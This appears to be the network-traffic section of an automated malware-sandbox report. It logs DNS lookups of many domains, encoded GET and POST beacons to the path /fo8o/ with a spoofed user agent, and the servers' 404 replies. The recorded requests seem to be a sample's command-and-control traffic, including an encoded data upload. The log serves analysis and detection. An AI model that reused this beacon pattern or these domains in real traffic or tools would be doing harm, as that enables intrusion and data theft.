            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.shenzhoucui.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBck89gksl+IJQQsBNVEJ3Y46WCh4jtmLfecQ=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.b301.spaceConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG85 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: global trafficDNS traffic detected: DNS query: www.shenzhoucui.com
            Source: global trafficDNS traffic detected: DNS query: www.b301.space
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 202Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 65 32 4f 76 2f 78 70 73 6d 4c 4d 41 46 48 55 74 45 6a 32 6f 50 6a 43 64 33 45 42 51 62 2f 41 4c 52 41 3d 3d Data Ascii: Zl4h1=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmfe2Ov/xpsmLMAFHUtEj2oPjCd3EBQb/ALRA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 09 Jun 2024 15:59:50 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:00:06 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:00:09 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:00:12 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:00:14 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 09 Jun 2024 16:00:49 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 17X-Rate-Limit-Reset: 2024-06-09T16:00:50.2799408Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 09 Jun 2024 16:00:52 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-06-09T16:00:55.3357885Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 09 Jun 2024 16:00:54 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 17X-Rate-Limit-Reset: 2024-06-09T16:00:55.3357885Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 09 Jun 2024 16:00:57 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-06-09T16:00:57.8280283Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:25 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:28 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:30 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:33 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:39 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:01:41 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
